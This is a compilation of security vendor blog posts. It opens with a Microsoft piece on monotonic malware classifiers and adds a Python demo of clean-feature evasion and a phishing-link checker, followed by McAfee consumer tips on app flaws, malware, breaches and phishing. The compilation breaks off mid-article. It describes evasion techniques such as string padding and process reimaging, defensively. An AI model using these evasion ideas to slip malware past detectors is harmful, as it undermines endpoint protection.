Figure 1. Features used by a baseline versus a monotonic constrained logistic regression classifier. The monotonic classifier does not use cleanly-weighted features so that it’s more robust to adversaries.

Inspired by the academic research, we deployed our first monotonic logistic regression models to Microsoft Defender ATP cloud protection service in late 2018. Since then, they’ve played an important part in protecting against attacks.

Figure 2 below illustrates the production performance of the monotonic classifiers versus the baseline unconstrained model. As expected, monotonic-constrained models detect less malware overall than classic models. However, they can detect malware attacks that otherwise would have been missed because of clean features.

Figure 2. Malware detection machine learning classifiers comparing the unconstrained baseline classifier versus the monotonic constrained classifier in customer protection.

The monotonic classifiers don’t replace baseline classifiers; they run in addition to the baseline and add additional protection. We combine all our classifiers using stacked classifier ensembles; monotonic classifiers add significant value because of the unique classification they provide.

How Microsoft Defender ATP uses monotonic models to stop adversarial attacks

One common way for attackers to add clean features to malware is to digitally code-sign malware with trusted certificates. Malware families like ShadowHammer, Kovter, and Balamid are known to abuse certificates to evade detection. In many of these cases, the attackers impersonate legitimate registered businesses to defraud certificate authorities into issuing them trusted code-signing certificates.

LockerGoga, a strain of ransomware that’s known for being used in targeted attacks, is another example of malware that uses digital certificates. LockerGoga emerged in early 2019 and has been used by attackers in high-profile campaigns that targeted organizations in the industrial sector. Once attackers are able to breach a target network, they use LockerGoga to encrypt enterprise data en masse and demand ransom.

Figure 3. LockerGoga variant digitally code-signed with a trusted CA

When Microsoft Defender ATP encounters a new threat like LockerGoga, the client sends a featurized description of the file to the cloud protection service for real-time classification. An array of machine learning classifiers processes the features describing the content, including whether attackers had digitally code-signed the malware with a trusted code-signing certificate that chains to a trusted CA. By ignoring certificates and other clean features, monotonic models in Microsoft Defender ATP can correctly identify attacks that otherwise would have slipped through defenses.

Very recently, researchers demonstrated an adversarial attack that appends a large volume of clean strings from a computer game executable to several well-known malware and credential dumping tools – essentially adding clean features to the malicious files – to evade detection. The researchers showed how this technique can successfully impact machine learning prediction scores so that the malware files are not classified as malware. The monotonic model hardening that we’ve deployed in Microsoft Defender ATP is key to preventing this type of attack, because, for a monotonic classifier, adding features to a file can only increase the malicious score.
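To make the property described above concrete, here is a small pure-Python reproduction of the idea (an added example; it is not Microsoft’s production model or code from the post). It trains an unconstrained logistic regression and a monotonic one (weights projected onto the non-negative orthant after every gradient step) on a constructed corpus, then scores a constructed LockerGoga-style sample before and after a trusted signature and benign strings are added. The feature names, corpus and weights are all assumptions for illustration.

```python
"""Monotonic vs. unconstrained logistic regression for malware scoring.

Added example, not Microsoft's model: a tiny pure-Python reproduction of
the monotonic-constraint idea from Incer et al. (2018). Feature names,
the training corpus and the resulting weights are constructed.
"""
import math
import random

# Constructed feature vocabulary: indices 0-2 tend to occur in malware,
# indices 3-5 tend to occur in clean software.
FEATURES = [
    "imports_credential_api",    # 0
    "writes_autorun_key",        # 1
    "high_section_entropy",      # 2
    "trusted_code_signature",    # 3
    "benign_string_ratio_high",  # 4
    "has_version_info",          # 5
]
MALICIOUS_IDX = (0, 1, 2)
CLEAN_IDX = (3, 4, 5)


def _sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def train_lr(rows, labels, monotonic, epochs=1500, lr=0.5, l2=1e-3):
    """Batch gradient descent for logistic regression.

    With monotonic=True every weight is clipped to >= 0 after each step
    (projected gradient descent), so the score is non-decreasing in every
    feature: adding any feature can only raise the malicious probability.
    The bias stays unconstrained. Returns (weights, bias).
    """
    n_feat = len(rows[0])
    w = [0.0] * n_feat
    b = 0.0
    m = len(rows)
    for _ in range(epochs):
        gw = [0.0] * n_feat
        gb = 0.0
        for x, y in zip(rows, labels):
            err = _sigmoid(b + sum(wi * xi for wi, xi in zip(w, x))) - y
            for i in range(n_feat):
                gw[i] += err * x[i]
            gb += err
        for i in range(n_feat):
            w[i] -= lr * (gw[i] / m + l2 * w[i])
            if monotonic and w[i] < 0.0:
                w[i] = 0.0  # projection: "clean-leaning" weights become 0
        b -= lr * gb / m
    return w, b


def score(model, x):
    """Malicious probability of binary feature vector x under model."""
    w, b = model
    return _sigmoid(b + sum(wi * xi for wi, xi in zip(w, x)))


def is_monotonic(model):
    return all(wi >= 0.0 for wi in model[0])


def build_training_set(seed=7, n=200):
    """Constructed labelled corpus: malware mostly carries malicious
    features, clean software mostly carries clean ones, with noise."""
    rng = random.Random(seed)
    rows, labels = [], []
    for _ in range(n):
        mal = rng.random() < 0.5
        x = [0] * len(FEATURES)
        for i in MALICIOUS_IDX:
            x[i] = int(rng.random() < (0.8 if mal else 0.1))
        for i in CLEAN_IDX:
            x[i] = int(rng.random() < (0.15 if mal else 0.85))
        rows.append(x)
        labels.append(1 if mal else 0)
    return rows, labels


def evasion_experiment():
    """Score a constructed malware sample before/after clean-feature padding."""
    rows, labels = build_training_set()
    baseline = train_lr(rows, labels, monotonic=False)
    mono = train_lr(rows, labels, monotonic=True)
    malware = [1, 1, 1, 0, 0, 0]   # malicious behaviour, no clean features
    padded = [1, 1, 1, 1, 1, 1]    # same file, now signed and string-padded
    return {
        "baseline_before": score(baseline, malware),
        "baseline_after": score(baseline, padded),
        "monotonic_before": score(mono, malware),
        "monotonic_after": score(mono, padded),
        "monotonic_weights_nonneg": is_monotonic(mono),
        "baseline_uses_clean_features": any(baseline[0][i] < 0 for i in CLEAN_IDX),
    }


if __name__ == "__main__":
    for name, value in evasion_experiment().items():
        print(f"{name:>30}: {value}")
```

The baseline score drops once the clean features are present, while the monotonic score cannot drop, which is the evasion-resistance property the post relies on.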

Given how they significantly harden defenses, monotonic models are now standard components of machine learning protections in Microsoft Defender ATP’s Antivirus. One of our monotonic models uniquely blocks malware on an average of 200,000 distinct devices every month. We now have three different monotonic classifiers deployed, protecting against different attack scenarios.

Monotonic models are just the latest enhancements to Microsoft Defender ATP’s Antivirus. We continue to evolve machine learning-based protections to be more resilient to adversarial attacks. More effective protections against malware and other threats on endpoints increases defense across the entire Microsoft Threat Protection. By unifying and enabling signal-sharing across Microsoft’s security services, Microsoft Threat Protection secures identities, endpoints, email and data, apps, and infrastructure.


Geoff McDonald (@glmcdona), Microsoft Defender ATP Research team
with Taylor Spangler, Windows Data Science team

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post New machine learning model sifts through the good to unearth the bad in evasive malware appeared first on Microsoft Security.

4 Ways for Parents to Handle the Facebook Messenger Bug

9 out of 10 children in the U.S. between the ages of six and twelve have access to smart devices. And while parents know it’s important for their children to learn to use technology in today’s digital world, 75% want more visibility into their kids’ digital activities. This is precisely why Facebook designed Messenger Kids to empower parents to monitor their children’s safety online. However, the popular social media platform had to recently warn users of a security issue within this app for kids.

The central benefit of Messenger Kids is that children can only chat with other users their parents approve of. Yet one design flaw within the group chat feature prevented Facebook from upholding this rule. Children who started a group chat could include any of their approved connections in the conversation, even if a user was not authorized to message the other kids in the chat. As a result, thousands of children were able to connect with users their parents weren’t aware of via this flaw.

Luckily, Facebook removed the unauthorized group chats and flagged the issue to all affected users, promising that potentially unsafe chats won’t happen again. While Facebook has not yet made a formal public response, they confirmed the bug to The Verge:

“We recently notified some parents of Messenger Kids account users about a technical error that we detected affecting a small number of group chats. We turned off the affected chats and provided parents with additional resources on Messenger Kids and online safety.”

Facebook is still working on resolving the bug itself. However, there are many actions parents can take to ensure that their child is safe on Facebook Messenger, and social media apps in general. Start by following these four best practices to secure your kid’s online presence:

  • Turn on automatic app updates on your child’s device. Updates usually include new and improved app features that your child will be excited to try. But more importantly, they tend to account for security bugs. Delaying updates can leave apps vulnerable to cybercriminals and turning on automatic app updates ensures that you don’t have to worry about missing one.
  • Get educated. Some parents find it helpful to use the same apps as their child to better understand how it works and what safety threats might be relevant. Facebook also offers resources online that provide guidance for staying safe, such as how and when to block a user and what kind of content is or isn’t risky to share. Additionally, it’s always a best practice to read the terms and conditions of an app before downloading to make sure you’re aware of what your child is signing up for.
  • Keep an open dialogue about online safety. It’s important to discuss your child’s online activities with them and walk them through best internet practices, such as changing passwords every so often and not clicking on links from unknown sources. That way, they’ll be better prepared for potential cyberthreats. Making the internet a part of the conversation will also help your child feel comfortable coming to you about things they might be skeptical about online.
  • Consider leveraging a security solution with parental controls. Depending on your child’s age and how much of a window you want into their online behaviors, you can leverage a solution such as McAfee Safe Family that can be helpful for creating a safe online environment. You can block certain websites and create predefined rules, which will help prevent your child from sharing compromising information.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 4 Ways for Parents to Handle the Facebook Messenger Bug appeared first on McAfee Blogs.

Downloaded FaceApp? Here’s How Your Privacy Is Now Affected

If you’ve been on social media recently, you’ve probably seen some people in your feed posting images of themselves looking elderly. That’s because FaceApp, an AI face editor that went viral in 2017, is making a major comeback with the so-called FaceApp Challenge — where celebrities and others use the app’s old age filter to add decades onto their photos. While many folks have participated in the fun, there are some concerns about the way that the app operates when it comes to users’ personal privacy.

According to Forbes, over 100,000 million people have reportedly downloaded FaceApp from the Google Play Store and the app is the number one downloaded app on the Apple App Store in 121 different countries. But what many of these users are unaware of is that when they download the app, they are granting FaceApp full access to the photos they have uploaded. The company can then use these photos for their benefit, such as training their AI facial recognition algorithm. And while there is currently nothing to indicate that the app is taking photos for malicious intent, it is important for users to be aware that their personal photos may be used for other purposes beyond the original intent.

So, how can users enjoy the entertainment of apps like FaceApp without sacrificing their privacy? Follow these tips to help keep your personal information secure:

  • Think before you upload. It’s always best to err on the side of caution with any personal data and think carefully about what you are uploading or sharing. A good security practice is to only share personal data, including personal photos, when it’s truly necessary.
  • Update your settings. If you’re concerned about FaceApp having permission to access your photos, it’s time to assess the tools on your smartphone. Check which apps have access to information like your photos and location data. Change permissions by either deleting the app or changing your settings on your device.
  • Understand and read the terms. Consumers can protect their privacy by reading the Privacy Policy and terms of service and knowing who they are dealing with.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Downloaded FaceApp? Here’s How Your Privacy Is Now Affected appeared first on McAfee Blogs.

Is Your WhatsApp Being Weird? You May Need to Check For Hidden Malware

Android has seen massive growth over the last 10 years, accumulating over 2.5 billion monthly active users since its inception. With so many users, it’s no wonder why cybercriminals continuously look to exploit Android devices. In fact, 25 million Android users have recently been hit with a new malware.

Dubbed Agent Smith, this cyberthreat sneaks onto a user’s device when the user downloads a malicious app from the app store, like a photo utility or game app. The app then silently installs the malware disguised as a legitimate Google updating tool. However, no updating icon appears on the screen, making the user oblivious to their device being in danger. Once installed, the malware replaces legitimate apps on the user’s phone, such as WhatsApp, with an evil update that serves bad ads. According to security researchers, the ads themselves aren’t malicious. But if a victim accidentally clicks on the ad, the hackers can make money from these ad fraud schemes. What’s more, there’s potential that these bad ads aren’t limited to just WhatsApp and could be found on other platforms as well.

So, what can Android users do to prevent this malware from sneaking onto their device? Check out the following tips to help stay secure:

  • Be wary of WhatsApp ads. Android users should take action if they experience advertisements displayed at strange times, such as when they open WhatsApp. The legitimate WhatsApp does not serve ads, so if you experience ads on this platform your device might have been infected.
  • Look out for suspicious apps. Check the apps and notifications section of your Android settings. If you see suspicious apps with names such as Google Updater, Google Installer for U, Google Powers, and Google Installer, uninstall these apps right away.
  • Stay away from unofficial Android stores. Google has extra precautions designed to prevent malware from getting onto the official Android store website, so only downloading apps from there could help protect you.
  • Use a security solution. A solution like McAfee Mobile Security can help Android users stay protected from threats like mobile malware. It also provides a free antivirus cleaner and phone security app to protect your online privacy and enhance device performance.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Your WhatsApp Being Weird? You May Need to Check For Hidden Malware appeared first on McAfee Blogs.

Watch Your Webcam: Tips to Protect Your Mac From Zoom Hackers

You’ve probably heard of the popular video conferencing platform, Zoom. This platform enables its millions of users in various locations to virtually meet face to face. In an effort to enhance user experience and work around changes in Safari 12, Zoom installed a web server that allows users to enjoy one-click-to-join meetings. Unfortunately, a security researcher recently disclosed that this product feature acts as a flaw that could allow cybercriminals to activate a Mac user’s webcam without their permission.

How exactly does this vulnerability work? Cybercriminals are able to exploit a feature that allows users to send a meeting link directly to a recipient. When the recipient clicks on the link, they are automatically launched into the video conferencing software. If the user has previously installed the Zoom app onto their Mac and hasn’t turned off their camera for meetings, Zoom will auto-join the user to a conference call with the camera on. With this flaw, an attacker can send a victim a meeting link via email message or web server, allowing them to look into a victim’s room, office, or wherever their camera is pointing. It’s important to note that even if a user has deleted the Zoom app from their device, the Zoom web server remains, making the device susceptible to this vulnerability.

While the thought of someone unknowingly accessing a user’s Mac camera is creepy, this vulnerability could also result in a Denial of Service (DoS) attack by overwhelming a user’s device with join requests. And even though this flaw has been successfully patched by Zoom, it’s important for users to realize that this update is not enforced by the platform. So, how can Zoom users avoid getting sucked into a potentially malicious call? Check out these security tips to stay secure on conference calls:

  • Adjust your Zoom settings. Users can disable the setting that allows Zoom to turn your camera on when joining a meeting. This will prevent a hacker from accessing your camera if you are sent a suspicious meeting link.
  • Update, update, update. Be sure to manually install the latest Zoom update to prevent DoS or other potential attacks. Additionally, Zoom will introduce an update in July that allows users to apply video preferences from their first call to all future calls. This will ensure that if a user joins their first meeting without video, this setting will remain consistent for all other calls.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Watch Your Webcam: Tips to Protect Your Mac From Zoom Hackers appeared first on McAfee Blogs.

Evolved IoT Linux Worm Targets Users’ Devices

Since the early ‘90s, Linux has been a cornerstone of computer operating systems. Today, Linux is everywhere — from smartphones and streaming devices to smart cars and refrigerators. This operating system has been historically less susceptible to malware, unlike its contemporaries such as Windows or Mac OS. However, the widespread adoption of IoT devices has changed that, as security vulnerabilities within Linux have been found over time. These flaws have been both examined by researchers in order to make repairs and also exploited by hackers in order to cause disruption.

As recently as last month, a new strain of a Linux bricking worm appeared, targeting IoT devices like tablets, wearables, and other multimedia players. A bricking worm is a type of malware that aims to permanently disable the system it infects. This particular strain, dubbed Silex, was able to break the operating systems of at least 4,000 devices. By targeting unsecured IoT devices running on Linux or Unix configurations, the malware went to work. It quickly rendered devices unusable by trashing device storage, as well as removing firewalls and other network configurations. With this threat, many users will initially think their IoT device is broken, when really it is momentarily infected. To resolve the issue, users must manually download and reinstall the device’s firmware, which can be a time-consuming and difficult task. And while this incident is now resolved, Silex serves as a cautionary tale to users and manufacturers alike as IoT devices continue to proliferate into almost every aspect of everyday life.

With an estimated 75.4 billion IoT connected devices installed worldwide by 2025, it’s important for users to remain focused on securing all their devices. Consider these tips to up your personal device security:

  • Keep your security software up-to-date. Software and firmware patches are always being released by companies. These updates are made to combat newly discovered vulnerabilities, so be sure to update every time you’re prompted to.
  • Pay attention to the news. With more and more information coming out around vulnerabilities and flaws, companies are more frequently sending out updates for IoT devices. While these should come to you automatically, be sure to pay attention to what is going on in the space of IoT security to ensure you’re always in the know.
  • Change your device’s factory security settings. When it comes to IoT products, many manufacturers aren’t thinking “security first.” A device may be vulnerable as soon as the box is opened, and many cybercriminals know how to get into vulnerable IoT devices via default settings. By changing the factory settings, you are instantly upgrading your device’s security.
  • Use best practices for linked accounts. If you connect a service that leverages a credit card, protect that linked service account with strong passwords and two-factor authentication (2FA) where possible. In addition, pay attention to notification emails, especially those regarding new orders for goods or services. If you notice suspicious activity, act accordingly.
  • Set up a separate IoT network. Consider setting up a second network for your IoT devices that doesn’t share access with your other devices and data. You can check your router manufacturer’s website to learn how. You may also want to add another network for guests and their devices.
  • Get security at the start. Lastly, consider getting a router with built-in security features to make it easier to protect all the devices in your home from one place.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Evolved IoT Linux Worm Targets Users’ Devices appeared first on McAfee Blogs.

Is Your Smart Home Secure? 5 Tips to Help You Connect Confidently

With so many smart home devices being used today, it’s no surprise that users would want a tool to help them manage this technology. That’s where Orvibo comes in. This smart home platform helps users manage their smart appliances such as security cameras, smart lightbulbs, thermostats, and more. Unfortunately, the company left an Elasticsearch server online without a password, exposing billions of user records.

The database was found in mid-June, meaning it’s been exposed to the internet for two weeks. The database appears to have cycled through at least two billion log entries, each containing data about Orvibo SmartMate customers. This data includes customer email addresses, the IP address of the smart home devices, Orvibo usernames, and hashed passwords.


More IoT devices are being created every day and we as users are eager to bring them into our homes. However, device manufacturers need to make sure that they are creating these devices with at least the basic amount of security protection so users can feel confident utilizing them. Likewise, it’s important for users to remember what risks are associated with these internet-connected devices if they don’t practice proper cybersecurity hygiene. Taking the time to properly secure your devices can mean the difference between a cybercriminal accessing your home network or not. Check out these tips to help you remain secure when using your IoT devices:

  • Research before you buy. Although you might be eager to get the latest device, some are made more secure than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks these features, consider upgrading.
  • Safeguard your devices. Before you connect a new IoT device to your network, be sure to change the default username and password to something strong and unique. Hackers often know the default settings of various IoT devices and share them online for others to exploit. Turn off other manufacturer settings that don’t benefit you, like remote access, which could be used by cybercriminals to access your system.
  • Update, update, update. Make sure that your device software is always up-to-date. This will ensure that you’re protected from any known vulnerabilities. For some devices, you can even turn on automatic updates to ensure that you always have the latest software patches installed.
  • Secure your network. Just as it’s important to secure your actual device, it’s also important to secure the network it’s connected to. Help secure your router by changing its default name and password and checking that it’s using an encryption method to keep communications secure. You can also look for home network routers or gateways that come embedded with security software like McAfee Secure Home Platform.
  • Use a comprehensive security solution. Use a solution like McAfee Total Protection to help safeguard your devices and data from known vulnerabilities and emerging threats.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Your Smart Home Secure? 5 Tips to Help You Connect Confidently appeared first on McAfee Blogs.

#Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account

If you’re an avid Instagram user, chances are you’ve come across some accounts with a little blue checkmark next to the username. This little blue tick is Instagram’s indication that the account is verified. While it may seem insignificant at first glance, this badge actually means that Instagram has confirmed that the account is an authentic page of a public figure, celebrity, or global brand. In today’s world of social media influencers, receiving a verified badge is desirable so other users know you’re a significant figure on the platform. However, cybercriminals are taking advantage of the appeal of being Instagram verified as a way to convince users to hand over their credentials.

So, how do cybercriminals carry out this scheme? According to security researcher Luke Leal, this scam was distributed as a phishing page through Instagram. The page resembled a legitimate Instagram submission page, prompting victims to apply for verification. After clicking on the “Apply Now” button, victims were taken to a series of phishing forms on the domain “Instagramforbusiness[.]info.” These forms asked users for their Instagram logins as well as confirmation of their email and password credentials. If the victim submitted the form, their Instagram credentials would make their way into the cybercriminal’s email inbox. With this information, the cybercrooks would have unauthorized access to the victim’s social media page. What’s more, since this particular phishing scam also targets the user’s associated email login, hackers would be able to reset the password and verify ownership of the victim’s account.

Whether you’re in search of an Instagram verification badge or not, it’s important to be mindful of your cybersecurity. And with Social Media Day right around the corner, check out these tips to keep your online profiles protected from phishing and other cyberattacks:

  • Exercise caution when inspecting links. If you examine the link used for this scam (Instagramforbusiness[.]info), you can see that it is not actually affiliated with Instagram.com. Additionally, it doesn’t use the secure HTTPS protocol, indicating that it is a risky link. Always inspect a URL before you click on it. And if you can’t tell whether a link is malicious or not, it’s best to avoid interacting with it altogether.
  • Don’t fall for phony pages. If you or a family member is in search of a verified badge for their Instagram profile, make sure they are familiar with the process. Instagram users should go into their own account settings and click on “Request on verification” if they are looking to become verified. Note that Instagram will not ask for your email or password during this process, but will send you a verification link via email instead.
  • Reset your password. If you suspect that a hacker is attempting to gain control of your account, play it safe by resetting your password.
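The first tip above, checking that a link really belongs to Instagram.com and uses HTTPS, is easy to get wrong with a plain substring search. The following Python helper is an added example, not code from the McAfee post; the sample links other than the scam domain named above are constructed for illustration.

```python
from urllib.parse import urlsplit

# Constructed sample links (the look-alike domain is the one named in the post;
# the rest are made-up examples of common look-alike tricks).
SAMPLE_LINKS = [
    "https://www.instagram.com/accounts/login/",      # genuine subdomain
    "https://instagram.com/",                        # genuine apex domain
    "http://instagram.com/",                         # genuine host, but no HTTPS
    "http://Instagramforbusiness.info/apply",        # look-alike name, no HTTPS
    "https://instagramforbusiness.info/apply",       # look-alike name, even over HTTPS
    "https://instagram.com.example.net/login",       # brand used as a subdomain of another site
    "https://evil.example/instagram.com/login",      # brand in the path, not the host
    "https://instagram.com@evil.example/login",      # brand in the userinfo part, host is evil.example
]


def check_link(url, legit_domain="instagram.com"):
    """Return (ok, reason) for a link claiming to belong to legit_domain.

    ok is True only when the host is legit_domain itself or a subdomain of it
    (matched on a label boundary, never by substring) AND the scheme is HTTPS.
    """
    parts = urlsplit(url.strip())
    # urlsplit lowercases the host and strips any userinfo / port for us.
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return False, "no host in URL"
    if host != legit_domain and not host.endswith("." + legit_domain):
        return False, "host %r is not %s or a subdomain of it" % (host, legit_domain)
    if parts.scheme.lower() != "https":
        return False, "host matches but the link is not served over HTTPS"
    return True, "host matches and HTTPS is used"


def genuine_links(urls, legit_domain="instagram.com"):
    """Filter a list of links down to the ones that pass check_link."""
    return [u for u in urls if check_link(u, legit_domain)[0]]


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        ok, reason = check_link(link)
        print("%-5s %-48s %s" % ("OK" if ok else "RISKY", link, reason))
```

Only the first two sample links pass; every other one fails on the host check or on the missing HTTPS, including the ones that merely contain the string "instagram.com".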

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post #Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account appeared first on McAfee Blogs.

Process Reimaging: A Cybercrook’s New Disguise for Malware

As of early 2019, Windows 10 is running on more than 700 million devices, including PCs, tablets, phones, and even some gaming consoles. However, it turns out the widespread Windows operating system has some inconsistencies as to how it specifically determines process image file locations on disk. Our McAfee Advanced Threat Research team decided to analyze these inconsistencies and as a result uncovered a new cyberthreat called process reimaging. Similar to process doppelganging and process hollowing, this technique evades security measures, but with greater ease since it doesn’t require code injection. Specifically, this technique affects the ability for a Windows endpoint security solution to detect whether a process executing on the system is malicious or benign, allowing a cybercrook to go about their business on the device undetected.

Let’s dive into the details of this threat. Process reimaging leverages built-in Windows APIs, or application programming interfaces, which allow applications and the operating system to communicate with one another. One API, K32GetProcessImageFileName, lets endpoint security solutions such as Windows Defender look up the EXE file associated with a process so they can check whether it contains malicious code. With process reimaging, however, a cybercriminal could subvert the security solution’s trust in the Windows operating system APIs, which can return inconsistent FILE_OBJECT names and paths. Consequently, Windows Defender misunderstands which file name or path it is looking at and can no longer tell whether a process is trustworthy. By using this technique, cybercriminals can keep malicious processes running on a user’s device without the user knowing it.

So, the next question is — what can Windows users do to protect themselves from this potential threat? Check out these insights to help keep your device secure:

  • Update your software. Microsoft has issued a partial fix that stops cybercriminals from exploiting file names to disguise malicious code, which helps address at least part of the issue for Windows Defender only. And while file paths are still viable for exploitation, it’s worth updating your software regularly to ensure you always have the latest security patches, as this is a solid practice to work into your cybersecurity routine.
  • Work with your endpoint security vendor. To help ensure you’re protected from this threat, contact your endpoint security provider to see if they protect against process reimaging.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Process Reimaging: A Cybercrook’s New Disguise for Malware appeared first on McAfee Blogs.

3 Tips Venmo Users Should Follow to Keep Their Transactions Secure

You’ve probably heard of Venmo, the quick and convenient peer-to-peer mobile payments app. From splitting the check when eating out with friends to dividing the cost of bills, Venmo is an incredibly easy way to share money. However, users’ comfort with the app can sometimes result in a few negligent security practices. In fact, computer science student Dan Salmon recently scraped seven million Venmo transactions to prove that users’ public activity can be easily obtained if they don’t have the right security settings flipped on. Let’s explore his findings.

By scraping the company’s developer API, Salmon was able to download millions of transactions across a six-month span. That means he was able to see who sent money to whom, when they sent it, and why – as long as the transaction was set to “public.” Mind you, Salmon’s download comes just a year after a German researcher downloaded over 200 million transactions from the public-by-default app.

These data scrapes, if anything, act as a demonstration. They prove to users just how crucial it is to set up online mobile payment apps with caution and care. Therefore, if you’re a Venmo or other mobile payment app user, make sure to follow these tips in order to keep your information secure:

  • Set your settings to “private” immediately. Only the sender and receiver should know about a monetary transaction in the works. So, whenever you go to send money on Venmo or any other mobile payment app, make sure the transaction is set to “private.” For Venmo users specifically, you can flip from “public” to “private” by toggling the setting at the bottom right corner of the main “Pay or Request” page.
  • Limit the amount of data you share. Just because something is designed to be social doesn’t mean it should become a treasure trove of personal data. No matter the type of transaction you’re making, always try to limit the amount of personal information you include in the corresponding message. That way, any potential cybercriminals out there won’t be able to learn about your spending habits.
  • Add on extra layers of security. Beyond flipping on the right in-app security settings, it’s important to take any extra precautions you can when it comes to protecting your financial data. Create complex logins to your mobile payment apps, participate in biometric options if available, and ensure your mobile device itself has a passcode as well. This will all help ensure no one has access to your money but you.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 3 Tips Venmo Users Should Follow to Keep Their Transactions Secure appeared first on McAfee Blogs.

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

We here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Oftentimes, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

1.1M Emuparadise Accounts Exposed in Data Breach

If you’re an avid gamer or know someone who is, you might be familiar with the retro gaming site Emuparadise. This website boasts a large community, a vast collection of gaming music, game-related videos, game guides, magazines, comics, video game translations, and more. Unfortunately, news just broke that Emuparadise recently suffered a data breach in April 2018, exposing the data of about 1.1 million of their forum members.

The operators of the hacked-database search engine DeHashed shared this compromised data with the data breach reference site Have I Been Pwned. According to the site’s owner Troy Hunt, the breach impacted 1,131,229 accounts and involved stolen email addresses, IP addresses, usernames, and passwords stored as salted MD5 hashes. Password salting adds unique, random data to each user’s password before it is hashed, so identical passwords don’t produce identical hashes. However, the MD5 algorithm is fast enough to brute-force and is no longer considered sufficient for protecting passwords, creating cause for cybersecurity concern.

Emuparadise forced a credential reset after the breach occurred in April 2018. It’s important that users of Emuparadise games take steps to help protect their private information. If you know someone who’s an avid gamer, pass along the following tips to help safeguard their security:

  • Change up your password. If you have an Emuparadise account, you should change up your account password and email password immediately. Make sure the next one you create is strong and unique so it’s more difficult for cybercriminals to crack. Include numbers, lowercase and uppercase letters, and symbols. The more complex your password is, the better!
  • Keep an eye out for sketchy emails and messages. Cybercriminals can leverage stolen information for phishing emails and social engineering scams. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided.
  • Check to see if you’ve been affected. If you or someone you know has made an Emuparadise account, use this tool to check if you could have been potentially affected.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 1.1M Emuparadise Accounts Exposed in Data Breach appeared first on McAfee Blogs.

Say So Long to Robocalls

For as long as you’ve had a phone, you’ve probably experienced in one form or another a robocall. These days it seems like they are only becoming more prevalent too. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. While these scams vary by country, the most common type features the impersonation of legitimate organizations — like global tech companies, big banks, or the IRS — with the goal of acquiring user data and money. When a robocall hits, users need to be careful to ensure their personal information is protected.

